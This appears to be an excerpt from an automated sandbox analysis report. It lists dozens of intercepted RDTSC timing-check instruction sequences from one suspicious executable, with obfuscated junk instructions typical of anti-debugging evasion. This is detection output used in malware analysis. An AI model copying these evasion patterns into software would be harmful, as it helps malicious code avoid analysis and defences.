Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E6CD4E second address: E6CDF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C24FD04D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F8C24FD04C8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 sub ebx, dword ptr [ebp+122D3B8Ah] 0x0000002a push dword ptr fs:[00000000h] 0x00000031 mov ebx, dword ptr [ebp+122D3996h] 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e mov dword ptr [ebp+122D2D36h], esi 0x00000044 mov eax, dword ptr [ebp+122D01D5h] 0x0000004a push 00000000h 0x0000004c push esi 0x0000004d call 00007F8C24FD04C8h 0x00000052 pop esi 0x00000053 mov dword ptr [esp+04h], esi 0x00000057 add dword ptr [esp+04h], 0000001Ah 0x0000005f inc esi 0x00000060 push esi 0x00000061 ret 0x00000062 pop esi 0x00000063 ret 0x00000064 push FFFFFFFFh 0x00000066 add dword ptr [ebp+122D2F47h], esi 0x0000006c nop 0x0000006d jmp 00007F8C24FD04D2h 0x00000072 push eax 0x00000073 push eax 0x00000074 push edx 0x00000075 push eax 0x00000076 push edx 0x00000077 push eax 0x00000078 push edx 0x00000079 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E6CDF2 second address: E6CDF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E6CDF6 second address: E6CE05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C24FD04CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E71456 second address: E7147F instructions: 0x00000000 rdtsc 0x00000002 je 00007F8C2504F386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jo 00007F8C2504F38Ch 0x00000013 jnl 00007F8C2504F386h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F8C2504F38Eh 0x00000020 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E72515 second address: E72519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E735FA second address: E73609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jp 00007F8C2504F39Ah 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5FE0E second address: E5FE13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5FE13 second address: E5FE72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C2504F38Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F8C2504F398h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push ecx 0x00000014 jg 00007F8C2504F38Ch 0x0000001a pop ecx 0x0000001b mov eax, dword ptr [eax] 0x0000001d jmp 00007F8C2504F397h 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E59D1C second address: E59D26 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8C24FD04C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E59D26 second address: E59D35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C2504F38Bh 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5FE72 second address: E5FE88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C24FD04D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5FE88 second address: E5FE93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F8C2504F386h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5FF06 second address: E5FF10 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5FF10 second address: E5FF14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5FF14 second address: E5FF23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5FF23 second address: E5FF28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5FF28 second address: E3CE01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C24FD04D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jo 00007F8C24FD04DDh 0x00000010 call 00007F8C24FD04D0h 0x00000015 add dword ptr [ebp+122D2925h], edx 0x0000001b pop edi 0x0000001c lea eax, dword ptr [ebp+1248E814h] 0x00000022 mov ecx, dword ptr [ebp+12458D9Bh] 0x00000028 stc 0x00000029 nop 0x0000002a jmp 00007F8C24FD04D2h 0x0000002f push eax 0x00000030 jmp 00007F8C24FD04D1h 0x00000035 nop 0x00000036 mov edi, dword ptr [ebp+122D3680h] 0x0000003c lea eax, dword ptr [ebp+1248E7D0h] 0x00000042 mov dword ptr [ebp+12456204h], eax 0x00000048 nop 0x00000049 jmp 00007F8C24FD04D6h 0x0000004e push eax 0x0000004f jnl 00007F8C24FD04CAh 0x00000055 nop 0x00000056 jo 00007F8C24FD04C9h 0x0000005c mov cx, di 0x0000005f call dword ptr [ebp+122D1AB5h] 0x00000065 push eax 0x00000066 push edx 0x00000067 push ecx 0x00000068 je 00007F8C24FD04C6h 0x0000006e pop ecx 0x0000006f jmp 00007F8C24FD04D2h 0x00000074 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E8A9B9 second address: E8A9BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E8A9BF second address: E8A9C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E8AB04 second address: E8AB1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C2504F38Fh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E8AB1D second address: E8AB5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F8C24FD04D6h 0x0000000b popad 0x0000000c push ecx 0x0000000d jmp 00007F8C24FD04D9h 0x00000012 jc 00007F8C24FD04C6h 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E8AE09 second address: E8AE14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F8C2504F386h 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E8AE14 second address: E8AE2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F8C24FD04C6h 0x0000000a jmp 00007F8C24FD04D0h 0x0000000f rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E08B5C second address: E08B62 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E164B3 second address: E164B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E950D9 second address: E950E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E950E0 second address: E9510D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F8C24FD04C6h 0x0000000a popad 0x0000000b jno 00007F8C24FD04D5h 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jg 00007F8C24FD04C6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E95252 second address: E95256 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E95256 second address: E9525C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E9525C second address: E95262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E95262 second address: E952A0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8C24FD04D2h 0x00000008 jmp 00007F8C24FD04D4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F8C24FD04D2h 0x00000017 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E952A0 second address: E952A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E957BA second address: E957C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 ja 00007F8C24FD04C6h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E957C8 second address: E957CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E957CC second address: E957D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E9591F second address: E9592B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F8C2504F386h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E95D4A second address: E95D50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E95D50 second address: E95D55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EA129C second address: EA12A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EA12A0 second address: EA12AA instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8C2504F386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EA12AA second address: EA12CD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F8C24FD04D4h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pushad 0x0000000c jc 00007F8C24FD04C6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EA12CD second address: EA12E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F8C2504F386h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edi 0x0000000e jmp 00007F8C2504F38Bh 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EA1429 second address: EA142F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EA142F second address: EA1433 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EA1433 second address: EA1437 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EA1559 second address: EA155F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EA155F second address: EA1563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EA22DA second address: EA22DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EA22DE second address: EA22E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EA22E6 second address: EA232B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F8C2504F395h 0x0000000a jmp 00007F8C2504F38Eh 0x0000000f jnl 00007F8C2504F386h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F8C2504F392h 0x0000001d push eax 0x0000001e pop eax 0x0000001f rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EA232B second address: EA232F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EA56CC second address: EA56D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EA53AA second address: EA53B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EA53B0 second address: EA53B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EA53B6 second address: EA53DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F8C24FD04D6h 0x0000000b jmp 00007F8C24FD04CAh 0x00000010 jnl 00007F8C24FD04C6h 0x00000016 pop edx 0x00000017 pushad 0x00000018 jng 00007F8C24FD04C8h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EA53DF second address: EA53E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EA53E3 second address: EA5408 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C24FD04D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F8C24FD04C6h 0x00000011 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EAC5D4 second address: EAC5D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EAB9CA second address: EAB9D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F8C24FD04C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EABC90 second address: EABC98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EABC98 second address: EABCA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8C24FD04C6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EABCA7 second address: EABCAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EAED3D second address: EAED64 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F8C24FD04D8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c ja 00007F8C24FD04C6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EAED64 second address: EAED90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C2504F38Ah 0x00000009 jmp 00007F8C2504F397h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EAED90 second address: EAEDAC instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8C24FD04C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8C24FD04D0h 0x00000011 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EAEEF3 second address: EAEEF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EAEEF8 second address: EAEEFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EAEEFE second address: EAEF02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EAEF02 second address: EAEF0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EAEF0C second address: EAEF10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EAF03D second address: EAF041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EAF041 second address: EAF05A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C2504F395h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EAF05A second address: EAF0A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8C24FD04D8h 0x00000008 jnc 00007F8C24FD04C6h 0x0000000e jbe 00007F8C24FD04C6h 0x00000014 jc 00007F8C24FD04C6h 0x0000001a popad 0x0000001b push edi 0x0000001c jnl 00007F8C24FD04C6h 0x00000022 jnp 00007F8C24FD04C6h 0x00000028 pop edi 0x00000029 pop edx 0x0000002a pop eax 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push ecx 0x00000030 pop ecx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EAF0A0 second address: EAF0B4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8C2504F386h 0x00000008 js 00007F8C2504F386h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ecx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EAF0B4 second address: EAF0CA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F8C24FD04D1h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EAF39A second address: EAF3A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EAF3A1 second address: EAF3B2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EAF3B2 second address: EAF3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EAF3B7 second address: EAF3C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F8C24FD04C6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EB738B second address: EB7391 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EB5D4F second address: EB5D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
